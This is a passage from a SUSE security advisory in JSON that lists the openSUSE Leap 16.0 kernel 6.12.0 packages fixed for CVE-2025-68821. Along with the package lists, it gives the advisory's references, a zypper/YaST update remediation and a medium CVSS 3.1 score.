"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68821",
"url": "https://www.suse.com/security/cve/CVE-2025-68821"
},
{
"category": "external",
"summary": "SUSE Bug 1256667 for CVE-2025-68821",
"url": "https://bugzilla.suse.com/1256667"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
